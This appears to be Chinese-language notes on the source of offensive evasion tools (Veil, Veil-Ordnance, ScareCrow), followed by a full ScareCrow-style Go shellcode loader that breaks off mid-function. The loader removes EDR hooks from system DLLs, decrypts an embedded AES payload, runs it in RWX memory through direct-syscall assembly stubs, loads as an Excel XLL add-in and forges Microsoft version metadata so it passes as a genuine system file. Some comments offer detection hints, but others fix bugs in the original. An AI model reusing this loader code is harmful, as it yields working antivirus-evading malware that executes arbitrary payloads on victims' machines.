os.system( 'env GOROOT={0} GOOS=windows GOARCH=386 {0}/bin/go build -ldflags "-s -w -H=windowsgui" -v -o {1} {2}'.format(settings.GOLANG_PATH, executable_filepath, source_code_filepath) )
- cs
os.system('mcs -platform:x86 -target:winexe ' + source_code_filepath + ' -out:' + executable_filepath)
- c
os.system('i686-w64-mingw32-gcc -Wl,-subsystem,windows ' + source_code_filepath + ' -o ' + executable_filepath + " -lwsock32")
其他payload
- 将exe转换为war(java)
tools\evasion\payloads\auxiliary\coldwar_wrapper.py
- 将powershell转换为macro
tools\evasion\payloads\auxiliary\macro_converter.py
Veil-Ordnance
Veil-Ordnance实现了生成x86格式的msf payload,原理是进行字节码替换
- https://github.com/Veil-Framework/Veil-Ordnance/blob/master/payloads/x86/init.py 实现了xor编码器
- https://github.com/Veil-Framework/Veil-Ordnance/blob/master/encoders/xor.py
关联 #3
ScareCrow源码阅读
ScareCrow作者的思路是读取dll原始文件中的.text段,覆盖内存中已加载的副本以去除钩子,然后通过syscall方式加载shellcode;此外还设计了一些依赖白服务的加载方式,包括控制面板、用JScript loader加载的excel、msiexec、wscript。为了看起来像正常程序,ScareCrow内置了一个版本信息库,会生成一些白服务的版本信息,同时也会自签名。

在kali里面使用,生成一个默认exe ./ScareCrow -I ../calc_x64.bin -domain baidu.com
在本地win10上打开失败了,在虚拟机win7上也失败了
杀毒报告

- https://s.threatbook.cn/report/file/a9e1e42f86939b4dced3a54bcdbc36d6f99119168c2525630e8218b5d0bcd376/?env=win7_sp1_enx64_office2013
- https://www.virustotal.com/gui/file/a9e1e42f86939b4dced3a54bcdbc36d6f99119168c2525630e8218b5d0bcd376/detection
它里面loader有好几种
[*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated.
[*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
(default "binary")
因为是在kali里面运行,msiexec、wscript两种loader都生成不成功。它生成的代码如下:
package main
import "C"
import (
"crypto/aes"
"crypto/cipher"
"debug/pe"
"encoding/base64"
"encoding/hex"
"loader/loader"
"os"
"io/ioutil"
"strconv"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
)
var (
// Per-OS-version call ids chosen in jqKvzXFk() and passed as the first
// argument of loader.Allocate (QTNgbdJ) and loader.NtProtectVirtualMemory
// (xPJtTukTggE). The assembly stub reads that argument as `callid` and moves
// it into AX, so these look like system service numbers — confirm against
// the loader package. They stay 0 for any version jqKvzXFk() does not know.
QTNgbdJ uint16
xPJtTukTggE uint16
)
// VylJFEkgR strips PKCS#7-style padding: the last byte is read as the pad
// length and that many trailing bytes are dropped. Nothing is validated —
// an empty input or a pad byte larger than len(WhjD) makes the index or
// slice expression panic.
func VylJFEkgR(WhjD []byte) []byte {
ZbWM := len(WhjD)
YyTwbW := int(WhjD[ZbWM-1])
return WhjD[:(ZbWM - YyTwbW )]
}
// jqKvzXFk reads the OS version from
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion and selects the two
// global call ids from it. CurrentMajorVersionNumber.CurrentMinorVersionNumber
// is preferred when that value exists, otherwise the legacy CurrentVersion
// string is used. Returns the version string. OpenKey/GetStringValue errors
// are ignored, and any version other than 10.0/6.3/6.2/6.1 leaves the
// globals at 0. Analyst note: this registry read is benign on its own; the
// interesting artefact is the version-to-call-id table below.
func jqKvzXFk() string {
OWNAR, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE)
xrwfel, _, _ := OWNAR.GetStringValue("CurrentVersion")
kHCaikI, _, err := OWNAR.GetIntegerValue("CurrentMajorVersionNumber")
// the integer fields override the string whenever they are present
if err == nil{
bHBHKpig, _, _ := OWNAR.GetIntegerValue("CurrentMinorVersionNumber")
xrwfel = strconv.FormatUint(kHCaikI, 10) + "." + strconv.FormatUint(bHBHKpig, 10)
}
// registered after the reads above; the key is still closed on return
defer OWNAR.Close()
// version -> call-id table consumed by loader.Allocate / loader.NtProtectVirtualMemory
if xrwfel == "10.0" {
QTNgbdJ = 0x18
xPJtTukTggE = 0x50
} else if xrwfel == "6.3" {
QTNgbdJ = 0x17
xPJtTukTggE = 0x4f
} else if xrwfel == "6.2" {
QTNgbdJ = 0x16
xPJtTukTggE = 0x4e
} else if xrwfel == "6.1" {
QTNgbdJ = 0x15
xPJtTukTggE= 0x4d
}
return xrwfel
}
// urSQbwP runs ODDiu over kernel32, kernelbase and ntdll in turn, i.e. it
// re-copies each module's on-disk .text section over the mapped image (see
// ODDiu). Errors are received but discarded — the if bodies are empty, so a
// failure on one module never stops the caller. Only invoked for version
// "10.0" (see Start). Detection angle: a user-mode process opening and
// parsing these three system DLLs from disk is an observable file-access
// pattern.
func urSQbwP() {
err := ODDiu("C:\\Windows\\System32\\kernel32.dll")
if err != nil {
}
err = ODDiu("C:\\Windows\\System32\\kernelbase.dll")
if err != nil {
}
err = ODDiu("C:\\Windows\\System32\\ntdll.dll")
if err != nil {
}
}
// main is intentionally empty: with `import "C"` and the //export directives
// below, the program appears to be built as a shared library whose entry
// points are Start and xlAutoOpen rather than main — confirm against the
// build command used.
func main() {
}
// xlAutoOpen is the exported name Excel calls when it loads an XLL add-in;
// here it only forwards to Start, so opening the add-in runs the loader.
//export xlAutoOpen
func xlAutoOpen() {
Start()
}
// Start is the real entry point (also reached via xlAutoOpen). Stages:
//  1. pick the call ids for this OS; on "10.0" additionally run urSQbwP().
//  2. base64-decode an embedded ciphertext, a 32-byte key and a 16-byte IV
//     (the base64 lengths fit AES-256-CBC), decrypt, strip padding, then
//     base64- and hex-decode the plaintext into raw bytes.
//  3. obtain memory through loader.Allocate with handle -1 (current process),
//     allocation type 0x3000 and protection 0x40, copy the bytes in and jump
//     to it with syscall.Syscall.
// Every decode error is ignored. Analyst note: key, IV and ciphertext are all
// constants in the binary, so the payload is recoverable statically; the
// allocate-write-execute sequence with protection 0x40 (read/write/execute)
// inside one function is the behavioural signal to look for.
//export Start
func Start() {
xrwfel := jqKvzXFk()
if xrwfel == "10.0" {
urSQbwP()
}
// ciphertext, key (32 bytes) and IV (16 bytes), all embedded as base64
eowXYy, _ := base64.StdEncoding.DecodeString("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")
zlbOVAro, _ := base64.StdEncoding.DecodeString("s+pun6IZu7pD4hNVseITTbHneqaKrW3Iy/+6pWp0Jsc=")
nyJBI, _ := base64.StdEncoding.DecodeString("ps+IenKBF96RquCWJC7KZQ==")
ceXUIZsjVdQ, err := aes.NewCipher(zlbOVAro)
if err != nil {
return
}
if len(eowXYy) < aes.BlockSize {
return
}
ejsDBvjep := make([]byte, len(eowXYy))
KyKSX := cipher.NewCBCDecrypter(ceXUIZsjVdQ, nyJBI)
KyKSX.CryptBlocks(ejsDBvjep, eowXYy)
// plaintext is padded base64 text wrapping a hex string
VDHrcqkMwKR := VylJFEkgR(ejsDBvjep)
KNmnWh := (string(VDHrcqkMwKR))
mQwDPce, _ := base64.StdEncoding.DecodeString(KNmnWh)
lkcytR, _ := hex.DecodeString(string(mQwDPce))
// silence stdout for the rest of the run
os.Stdout, _ = os.Open(os.DevNull)
var tnhVVDGIgZc uint64
var pCXyNRMdBh, LmEpft, IAvxNZLjEws, MCRUcjJkNxa uintptr
// -1 as a process handle means the current process
tnhVVDGIgZc = 0xffffffffffffffff
qRhafbY := len(lkcytR)
IZVU := uintptr(qRhafbY)
MCRUcjJkNxa = 0x40
IAvxNZLjEws = 0x3000
kFWe := loader.Allocate(QTNgbdJ, tnhVVDGIgZc, pCXyNRMdBh, LmEpft, IZVU, IAvxNZLjEws, MCRUcjJkNxa, 0)
// fixed-size array view over the allocation; indexing past 1890000 panics
dmFqlBSEYYK := (*[1890000]byte)(unsafe.Pointer(kFWe))
for x, y := range []byte(lkcytR) {
dmFqlBSEYYK [x] = y
}
// transfers control to the freshly written buffer
syscall.Syscall(kFWe, 0, 0, 0, 0)
}
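// sectionError reports a problem locating the .text section of an image.
type sectionError string

func (e sectionError) Error() string { return string(e) }

// ODDiu overwrites the in-memory .text section of an already-loaded DLL
// with the bytes of that section from the file on disk: it reads the file,
// locates .text in the PE headers, makes the mapped section writable with a
// direct NtProtectVirtualMemory syscall (number xPJtTukTggE), copies the
// file bytes over it, then restores the previous protection. urSQbwP calls
// it for kernel32, kernelbase and ntdll.
//
// Fixes over the original:
//   - the file slice was [Offset:Size] (length Size-Offset), so the last
//     Offset bytes of .text were never written; it is now
//     [Offset:Offset+Size] and checked against the file length;
//   - an image without a .text section returned a nil *pe.Section and
//     crashed on the field access; it now returns an error;
//   - the *pe.File was never closed;
//   - NtProtectVirtualMemory takes BaseAddress/RegionSize as in/out values
//     (it may round them to page granularity), so the write uses its own
//     copy of the section address instead of the possibly-rounded value.
// A failed protection change still panics, as before.
func ODDiu(name string) error {
	fileBytes, err := ioutil.ReadFile(name)
	if err != nil {
		return err
	}
	peFile, err := pe.Open(name)
	if err != nil {
		return err
	}
	defer peFile.Close()

	text := peFile.Section(".text")
	if text == nil {
		return sectionError("no .text section in " + name)
	}
	// text.Size is the raw (on-disk) size of the section, as the original used.
	start := int(text.Offset)
	end := start + int(text.Size)
	if end > len(fileBytes) {
		return sectionError(".text section extends past end of file: " + name)
	}
	diskText := fileBytes[start:end]

	module, err := windows.LoadDLL(name)
	if err != nil {
		return err
	}
	// Address of the mapped .text section in this process.
	textBase := uintptr(module.Handle) + uintptr(text.VirtualAddress)

	protectBase := textBase
	protectSize := uintptr(len(diskText))
	currentProcess := uintptr(0xffffffffffffffff) // -1: current-process pseudo-handle
	var oldProtect uintptr
	status, _ := NtProtectVirtualMemory(
		xPJtTukTggE,
		currentProcess,
		&protectBase,
		&protectSize,
		syscall.PAGE_EXECUTE_READWRITE,
		&oldProtect,
	)
	if status != 0 {
		panic("Call to VirtualProtect failed!")
	}
	// Byte-by-byte write through unsafe, as in the original: the destination
	// is a foreign mapping, not Go-owned memory.
	for i, b := range diskText {
		*(*byte)(unsafe.Pointer(textBase + uintptr(i))) = b
	}
	// Restore the previous protection over the same (possibly page-rounded)
	// range. As in the original, &oldProtect receives the second call's
	// old-protection output as well.
	status, _ = NtProtectVirtualMemory(
		xPJtTukTggE,
		currentProcess,
		&protectBase,
		&protectSize,
		oldProtect,
		&oldProtect,
	)
	if status != 0 {
		panic("Call to VirtualProtect failed!!")
	}
	return nil
}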
// NtProtectVirtualMemory adapts the pointer-typed arguments used by ODDiu
// to the flat uintptr argument list of the assembly stub
// loader.NtProtectVirtualMemory. CjSf is the syscall number; the remaining
// parameters follow the NtProtectVirtualMemory order (process handle,
// *base address, *region size, new protection, *old protection). The
// stub's status (uint32) and error are returned unchanged.
//
// NOTE(review): the uintptr(unsafe.Pointer(...)) conversions are kept
// inside the call expression on purpose; moving them into separate
// variables would let the pointed-to stack variables move before use.
// The error value should not be inspected by callers (see the note on the
// stub).
func NtProtectVirtualMemory(CjSf uint16, ZJFqa uintptr, TEFMkLIY, iJrZAdKtu *uintptr, GlPvHGO uintptr, PVAYyo *uintptr) (uint32, error) {
return loader.NtProtectVirtualMemory(
CjSf,
ZJFqa,
uintptr(unsafe.Pointer(TEFMkLIY)),
uintptr(unsafe.Pointer(iJrZAdKtu)),
GlPvHGO,
uintptr(unsafe.Pointer(PVAYyo)),
)
}
汇编代码
// Allocate is the direct-syscall stub behind loader.Allocate: AX = callid
// (the syscall number chosen by jqKvzXFk), the Go arguments are mapped onto
// the x64 syscall convention, and the address the kernel writes back through
// the BaseAddress pointer becomes the function result.
//
// NOTE(review): Start passes eight arguments plus one uintptr return, which
// by the 8-byte slot layout is a 72-byte argument frame, yet the TEXT line
// declares $0-56; and ZeroBits is loaded from +35(FP), which is not on a
// slot boundary (the fourth argument would be +24(FP)). Both look like
// transcription slips — confirm against the upstream source before relying
// on this listing.
TEXT ·Allocate(SB),$0-56
XORQ AX,AX
// callid is a uint16; AX was cleared above so the upper bits are zero.
MOVW callid+0(FP), AX
MOVQ PHandle+8(FP), CX
// DX -> an 8-byte slot above the arguments (SP+0x48), zeroed so the kernel
// chooses the address; by the ABI0 layout this appears to be the uintptr
// return slot, which is how the result gets back to Go — verify.
MOVQ SP, DX
ADDQ $0x48, DX
MOVQ $0,(DX)
MOVQ ZeroBits+35(FP), R8
// R9 -> the size argument in the frame (RegionSize is in/out).
MOVQ SP, R9
ADDQ $40, R9
// Shift SP so the 6th and 7th Go arguments sit at the stack positions the
// syscall convention uses for the 5th/6th parameters.
ADDQ $8,SP
// Windows x64 syscalls take the first parameter in R10.
MOVQ CX,R10
SYSCALL
SUBQ $8,SP
RET
//Shout out to C-Sto for helping me solve the issue of ... alot of this also based on https://golang.org/src/runtime/sys_windows_amd64.s
#define maxargs 8
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
// Generic direct-syscall stub: copies the variadic uintptr arguments onto
// the stack, loads the first four into the register parameters, and issues
// SYSCALL with AX = callid. Returns the status in the uint32 result.
//
// NOTE(review): argh_len is used as the REP MOVSQ count with no check that
// it is <= maxargs, so more than 8 arguments would write past the reserved
// stack area.
// NOTE(review): the LastError value read from the TEB at the end is stored
// into err_itable+40(FP), the itab word of the returned `error` interface;
// a non-zero LastError therefore yields an invalid interface value. The
// callers in this file discard err, so it is never dereferenced — keep it
// that way, or return the value as a plain integer instead.
TEXT ·NtProtectVirtualMemory(SB), $0-56
XORQ AX,AX
MOVW callid+0(FP), AX
PUSHQ CX
MOVQ argh_len+16(FP),CX
MOVQ argh_base+8(FP),SI
// DI = TEB (GS:[0x30]); clear LastErrorValue (+0x68) before the call, as
// the runtime helper this is modelled on does.
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
// Reserve maxargs*8 bytes and copy argh_len qwords from the slice onto it.
SUBQ $(maxargs*8), SP
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
// The extra 8 bytes stand in for a return-address slot so stack parameters
// 5+ sit where the x64 convention expects them (SP+0x28 onwards).
SUBQ $8, SP
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
// Register arguments mirrored into X0-X3, apparently carried over from the
// runtime's stdcall helper; harmless for an NT syscall.
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
// Windows x64 syscalls take the first parameter in R10.
MOVQ CX, R10
SYSCALL
ADDQ $((maxargs+1)*8), SP
POPQ CX
// Status from AX -> first return value (uint32).
MOVL AX, errcode+32(FP)
MOVQ 0x30(GS), DI
MOVL 0x68(DI), AX
MOVQ AX, err_itable+40(FP)
RET
获取随机文件名(白名单)
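// FileName picks an output name for the requested build mode from a fixed
// candidate list and returns (base name, file name with extension). The
// base name is also the key FileProperties uses to select version-resource
// metadata.
//
// Modes: "excel" -> *.xll, "control" -> *.cpl, "wscript" -> *.dll,
// "dll" and "msiexec" -> *.dll (same candidate list), "binary" -> *.exe.
// An unknown mode returns two empty strings, as before.
//
// Fix over the original: each list had a hard-coded upper bound passed to
// Cryptor.GenerateNumer, and the bounds had drifted from the list lengths
// (wscript has 9 entries but used 10 — an out-of-range index when 9 is
// drawn; dllname has 10 entries but used 9, so "win32u" was never chosen).
// Assuming GenerateNumer(0, n) yields [0, n) — four of the five original
// calls used exactly len(list) — the bound is now derived from the list.
//
// NOTE(review): several keys in FileProperties do not line up with these
// lists as visible here ("bisr" vs "bisrv", "inet" vs "inetcontrol", and
// "certcli"/"libcrypto" have no FileProperties entry), so those names get
// no version resource — confirm and align the two.
func FileName(mode string) (string, string) {
	wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"}
	dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"}
	cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"}
	officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"}
	Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"}

	// pick draws one candidate uniformly (per Cryptor.GenerateNumer).
	pick := func(candidates []string) string {
		return candidates[Cryptor.GenerateNumer(0, len(candidates))]
	}

	var name, ext string
	switch mode {
	case "excel":
		name, ext = pick(officename), ".xll"
	case "control":
		name, ext = pick(cplname), ".cpl"
	case "wscript":
		name, ext = pick(wscript), ".dll"
	case "dll", "msiexec":
		name, ext = pick(dllname), ".dll"
	case "binary":
		name, ext = pick(Binaryname), ".exe"
	default:
		return "", ""
	}
	return name, name + ext
}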
文件属性生成
import "github.com/josephspurrier/goversioninfo"
func FileProperties(name string, configFile string) string {
fmt.Println("[*] Creating an Embedded Resource File")
vi := &goversioninfo.VersionInfo{}
if configFile != "" {
var err error
input := io.ReadCloser(os.Stdin)
if input, err = os.Open("../" + configFile); err != nil {
log.Printf("Cannot open %q: %v", configFile, err)
os.Exit(3)
}
jsonBytes, err := ioutil.ReadAll(input)
input.Close()
if err != nil {
log.Printf("Error reading %q: %v", configFile, err)
os.Exit(3)
}
if err := vi.ParseJSON(jsonBytes); err != nil {
log.Printf("Could not parse the .json file: %v", err)
os.Exit(3)
}
name = vi.StringFileInfo.InternalName
} else if configFile == "" {
if name == "APMon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "APMon.dll.mui"
vi.StringFileInfo.FileDescription = "Adaptive Port Monitor"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "APMon.dll.mui"
}
if name == "bisr" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bisrv.dll.mui"
vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "bisrv.dll.mui"
}
if name == "btpanui" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "btpanui.dll.mui"
vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "btpanui.dll.mui"
}
if name == "cmdext" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "CmdExt.DLL"
vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "CmdExt.DLL"
}
if name == "httpapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "httpapi.dll.mui"
vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "httpapi.dll.mui"
}
if name == "logoncli" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
vi.StringFileInfo.FileDescription = "Net Logon Client DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1237"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1237
vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
}
if name == "netlogon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
vi.StringFileInfo.FileDescription = "Net Logon Services DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
}
if name == "tcpmon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
}
if name == "OneNote" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "OneNote"
vi.StringFileInfo.FileDescription = "Microsoft OneNote"
vi.StringFileInfo.FileVersion = "16.0.13901.20462"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 13901
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.13901.20462"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 13901
vi.FixedFileInfo.FileVersion.Build = 20462
vi.StringFileInfo.InternalName = "OneNote"
}
if name == "Excel" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Excel"
vi.StringFileInfo.FileDescription = "Microsoft Excel"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Excel"
}
if name == "Word" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Word"
vi.StringFileInfo.FileDescription = "Microsoft Word"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Word"
}
if name == "Powerpnt" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "POWERPNT"
vi.StringFileInfo.FileDescription = "Microsoft PowerPoint"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "POWERPNT"
}
if name == "Outlook" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Outlook.exe"
vi.StringFileInfo.FileDescription = "Microsoft Outlook"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
